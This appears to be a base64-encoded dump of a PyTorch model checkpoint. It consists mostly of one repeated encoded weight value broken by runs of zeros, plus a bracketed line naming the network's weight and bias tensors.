V+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+J
Ty1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1
fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU
8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX
[Base64-encoded binary payload omitted: a serialized PyTorch (pickle/FloatStorage, CPU) checkpoint whose state dict includes the tensors base.1.transform_features.weight, base.1.transform_features.bias, base.1.recombine_features.weight, base.1.recombine_features.bias, and base.2.message_passing_mat.]
tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPL